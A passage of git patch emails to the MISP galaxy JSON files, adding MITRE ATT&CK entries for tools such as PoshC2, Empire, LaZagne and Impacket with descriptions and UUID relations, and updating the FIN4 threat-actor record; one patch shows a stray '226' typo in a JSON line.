"82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "7cd0bc75-055b-4098-a00e-83dc8beaff14", + "value": "Remcos - S0332" + }, + { + "description": "[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1086). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)", + "meta": { + "external_id": "S0378", + "mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "refs": [ + "https://attack.mitre.org/software/S0378", + "https://github.com/nettitude/PoshC2" + ], + "synonyms": [ + "PoshC2" + ] + }, + "related": [ + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e906ae4d-1d3a-4675-be23-22f7311c0da4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "4b57c098-f043-4da2-83ef-7588a6d426bc", + "value": "PoshC2 - S0378" + }, { "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)", "meta": { @@ -2583,14 +3035,14 @@ "type": "uses" }, { - "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9d7c32f4-ab39-49dc-8055-8106bc2294a1", + "dest-uuid": "3dd58c80-4c2e-458c-9503-1b2cd273c4d2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2606,7 +3058,671 @@ ], "uuid": "da21929e-40c0-443d-bdf4-6b60d15448b4", "value": "Xbot - S0298" + }, + { + "description": "[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1086) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)\n\n", + "meta": { + "external_id": "S0363", + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0363", + "https://s3.eu-west-1.amazonaws.com/ncsc-content/files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf", + "https://github.com/PowerShellEmpire/Empire", + "https://github.com/dstepanic/attck_empire" + ], + "synonyms": [ + "Empire", + "EmPyre", + "PowerShell Empire" + ] + }, + "related": [ + { + "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "772bc7a8-a157-42cc-8728-d648e25c7fe7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6c174520-beea-43d9-aac6-28fb77f3e446", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1df0326d-2fbc-4d08-a16b-48365f1e742d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "391d824f-0ef1-47a0-b0ee-c59a75e27670", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "3433a9e8-1c47-4320-b9bf-ed449061d1c3", + "value": "Empire - S0363" + }, + { + "description": "[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)", + "meta": { + "external_id": "S0364", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0364", + "https://www.itprotoday.com/windows-78/eldos-provides-raw-disk-access-vista-and-xp", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf" + ], + "synonyms": [ + "RawDisk" + ] + }, + "related": [ + { + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", + "value": "RawDisk - S0364" + }, + { + "description": "[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)", + "meta": { + "external_id": "S0349", + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0349", + "https://github.com/AlessandroZ/LaZagne" + ], + "synonyms": [ + "LaZagne" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "b76b2d94-60e4-4107-a903-4a3a7622fb3b", + "value": "LaZagne - S0349" + }, + { + "description": "[Impacket](https://attack.mitre.org/software/S0357) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://attack.mitre.org/software/S0357) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.(Citation: Impacket Tools)", + "meta": { + "external_id": "S0357", + "mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0357", + "https://www.secureauth.com/labs/open-source-tools/impacket" + ], + "synonyms": [ + "Impacket" + ] + }, + "related": [ + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0dbf5f1b-a560-4d51-ac1b-d70caab3e1f0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "26c87906-d750-42c5-946c-d4162c73fc7b", + "value": "Impacket - S0357" + }, + { + "description": "[Ruler](https://attack.mitre.org/software/S0358) is a tool to abuse Microsoft Exchange services. It is publicly available on GitHub and the tool is executed via the command line. The creators of [Ruler](https://attack.mitre.org/software/S0358) have also released a defensive tool, NotRuler, to detect its usage.(Citation: SensePost Ruler GitHub)(Citation: SensePost NotRuler)", + "meta": { + "external_id": "S0358", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0358", + "https://github.com/sensepost/ruler", + "https://github.com/sensepost/notruler" + ], + "synonyms": [ + "Ruler" + ] + }, + "related": [ + { + "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "90ac9266-68ce-46f2-b24f-5eb3b2a8ea38", + "value": "Ruler - S0358" + }, + { + "description": "[Nltest](https://attack.mitre.org/software/S0359) is a Windows command-line utility used to list domain controllers and enumerate domain trusts.(Citation: Nltest Manual)", + "meta": { + "external_id": "S0359", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0359", + "https://ss64.com/nt/nltest.html" + ], + "synonyms": [ + "Nltest" + ] + }, + "related": [ + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "981acc4c-2ede-4b56-be6e-fa1a75f37acf", + "value": "Nltest - S0359" } ], - "version": 11 + "version": 13 } From ed351b4eae13b0820f5f590ad67d101b982ed4a2 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Wed, 1 May 2019 15:24:59 +0530 Subject: [PATCH 21/50] updated FIN4 --- clusters/threat-actor.json | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 24c73ed..dd846ac 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2619,15 +2619,22 @@ "value": "Berserk Bear" }, { + "description": "FIN4 is a financially-motivated threat group that has targeted confidential information related to the public financial market, particularly regarding healthcare and pharmaceutical companies, since at least 2013. FIN4 is unique in that they do not infect victims with typical persistent malware, but rather they focus on capturing credentials authorized to access email and other non-public correspondence.", "meta": { "attribution-confidence": "50", "country": "RO", - "synonyms": [ - "FIN4" + "refs": [ + "https://www.reuters.com/article/2015/06/23/us-hackers-insidertrading-idUSKBN0P31M720150623", + "https://www.fireeye.com/blog/threat-research/2014/11/fin4_stealing_insid.html", + "https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf", + "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html" + ], + "synonyms": [ + "Wolf Spider" ] }, "uuid": "ff449346-aa9f-45f6-b482-71e886a5cf57", - "value": "Wolf Spider" + "value": "FIN4" }, { "description": "First observed activity in December 2013.", From 3b185d8435582999d3cd3faf79fcbaba6773d066 Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Wed, 1 May 2019 15:40:10 +0530 Subject: [PATCH 22/50] Update threat-actor.json --- clusters/threat-actor.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index dd846ac..29dab9c 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -2629,7 +2629,7 @@ "https://www2.fireeye.com/rs/fireye/images/rpt-fin4.pdf", "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html" ], - "synonyms": [ + "synonyms": [ "Wolf Spider" ] }, From c565f61761be06e360ab133dc2ee2aacdcf1c72e Mon Sep 17 00:00:00 2001 From: Rony <49360849+r0ny123@users.noreply.github.com> Date: Wed, 1 May 2019 15:51:56 +0530 Subject: [PATCH 23/50] Update threat-actor.json --- clusters/threat-actor.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json index 29dab9c..0ce1a0f 100644 --- a/clusters/threat-actor.json +++ b/clusters/threat-actor.json @@ -8,7 +8,7 @@ ], "category": "actor", "description": "Known or estimated adversary groups targeting organizations and employees. Adversary groups are regularly confused with their initial operation or campaign.", - "name": "Threat actor", + "name": "Threat actor",226 "source": "MISP Project", "type": "threat-actor", "uuid": "7cdff317-a673-4474-84ec-4f1754947823", @@ -2630,7 +2630,7 @@ "https://pwc.blogs.com/cyber_security_updates/2015/06/unfin4ished-business.html" ], 